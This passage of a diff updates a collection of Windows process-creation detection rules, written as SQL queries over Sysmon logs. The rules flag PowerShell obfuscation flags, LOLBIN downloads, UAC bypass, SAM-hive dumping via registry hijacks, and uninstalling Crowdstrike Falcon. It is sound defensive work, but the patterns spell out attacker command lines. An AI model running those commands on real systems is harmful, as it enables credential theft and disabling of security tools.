'%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "Unknown" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE '\\' OR CommandLine LIKE '%Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "AppvClient", + "CCM", + "WinRM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "Exports Registry Key To a File", + "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "status": "test", + "description": "Detects the export of the target Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate export of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_regedit_export_keys.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.t1218.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Rare false positives could occur on servers with multiple drives." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Start Windows Service Via Net.EXE", - "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator or user executes a service for legitimate reasons." + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% start %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_start_service.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_net_use_mount_admin_share.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "status": "experimental", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1548.002" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE 